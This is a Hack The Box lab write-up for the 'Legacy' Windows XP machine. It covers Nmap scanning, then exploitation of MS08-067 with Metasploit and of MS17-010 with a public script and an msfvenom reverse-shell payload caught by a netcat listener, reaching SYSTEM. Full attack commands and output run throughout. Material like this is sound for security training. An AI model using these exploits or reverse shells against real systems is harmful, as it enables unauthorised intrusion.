Hack The Box Write-Up: Legacy

  

Reconnaissance: Portscan with Nmap

As always, we start by port scan with Nmap to enumerate open ports and service versions. For those who want to know more about Nmap’s commands and options, refer to my Nmap Cheatsheet:

nmap -sC -sV -oA legacy 10.10.10.4

-sC: default script scan
-sV: service version detection against open ports 
-oA: Output in the three major formats at once
root@kali:~/Desktop/htb/legacy# nmap -sC -sV -oA legacy 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-03 09:22 EDT
Nmap scan report for 10.10.10.4
Host is up (0.27s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h30m47s, deviation: 2h07m16s, median: 4d23h00m47s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:9c:4d (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-05-08T18:23:37+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

The results of Nmap scan shows:

PORTSERVICEVERSION
139/tcpnetbios-ssnMicrosoft Windows netbios-ssn
445/tcpmicrosoft-dsWindows XP microsoft-ds
3389/tcpms-wbt-server
nmap -p 139,445 --script vuln -Pn n 10.10.10.4

-p <port ranges>: Set destination port(s)
--script=<Lua scripts>: <Lua scripts> is a comma separated list of
           directories, script-files or script-categories
-Pn: Treat all hosts as online -- skip host discovery
-n: Do not resolve hostnames via DNS
root@kali:~/Desktop/htb/legacy# nmap -p 139,445 --script vuln -Pn n 10.10.10.4 
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-03 09:34 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Failed to resolve "n".
Nmap scan report for 10.10.10.4
Host is up (0.27s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

From the result above, we came to know the target appears vulnerable to both of ms08-067 used by Conficker and ms17-010 made famous by Wannacry.

Exploit: MS08-067 with Metasploit

First things first, we’ll execute “search ms08-067” on MSF to find exploit modules.

msf > search ms08-067
msf > search ms08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption

We’ll make use of the module “exploit/windows/smb/ms08_067_netapi” from the result and run it after setting required information.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
msf exploit(windows/smb/ms08_067_netapi) > set lhost 10.10.14.21
msf exploit(windows/smb/ms08_067_netapi) > run

Successfully, we can get a shell executed by “NT AUTHORITY\SYSTEM”

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

The following information on the target can be checked with the commands “sysinfo/systeminfo”:
– OS: Microsoft Windows XP Professional
– OS Version: 5.1.2600 Service Pack 3 Build 2600
– Architecutre: x86
– Hotfix: Q147222
– Original Install Date: 16/3/2017, 7:32:23

meterpreter > sysinfo
Computer        : LEGACY
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 1596 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name:                 LEGACY
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          user
Registered Organization:   HTB
Product ID:                55274-643-7213323-23904
Original Install Date:     16/3/2017, 7:32:23 ��
System Up Time:            0 Days, 0 Hours, 2 Minutes, 28 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~1999 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     511 MB
Available Physical Memory: 366 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.998 MB
Virtual Memory: In Use:    50 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.4

Exploit: MS07-010

We will also show you how to penetrate the target with another exploit “MS07-010” using the python script “send_and_execute.py” for XP machine from helvojunior:

git clone https://github.com/helviojunior/MS17-010

This python script requires you to create a payload for reverse shell to be executed after the exploit is successful. So, let’s create the stageless paylaod “windows/shell_reverse_tcp” named as “shell.exe” with Msfvenom. If you don’t know much about Msfvenom’s command options, please see below:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe

-p, --payload: Payload to use. Specify a '-' or stdin to use custom payloads
-f, --format: Output format
-a, --arch: The architecture to use
--platform: The platform of the payload
-o, --out: Save the payload
root@kali:~/Desktop/htb/legacy# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe

After the payload is created, run the script “send_and_execute.py” using the following command with the target ip and the path to payload specified:

python send_and_execute.py 10.10.10.4 ../shell.exe
root@kali:~/Desktop/htb/legacy/MS17-010# python send_and_execute.py 10.10.10.4 ../shell.exe 
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81f38570
SESSION: 0xe20e4830
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe21c03f8
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe21c0498
overwriting token UserAndGroups
Sending file KE7D5J.exe...
Opening SVCManager on 10.10.10.4.....
Creating service SFNP.....
Starting service SFNP.....
The NETBIOS connection with the remote host timed out.
Removing service SFNP.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

We can get a shell via a listener started with Netcat beforehand, but it tuns out that whoami.exe for checking current user is not present on the target.

root@kali:~/Desktop/htb/legacy# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.4] 1034
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

What we can do here is to launch smbserver.py for sharing whoami.exe with share name “share” from our attacking machine to the target.

root@kali:~/Desktop/htb/legacy# ls
impacket  ms08-067.py  MS17-010  shell.exe  smbserver.py  whoami.exe
root@kali:~/Desktop/htb/legacy# python smbserver.py share .

On the target, you can copy whoami.exe to the current folder and run it.

C:\WINDOWS\system32>copy \\10.10.14.21\share\whoami.exe .
copy \\10.10.14.21\share\whoami.exe .
        1 file(s) copied.

C:\WINDOWS\system32>whoami
whoami
NT AUTHORITY\SYSTEM

Link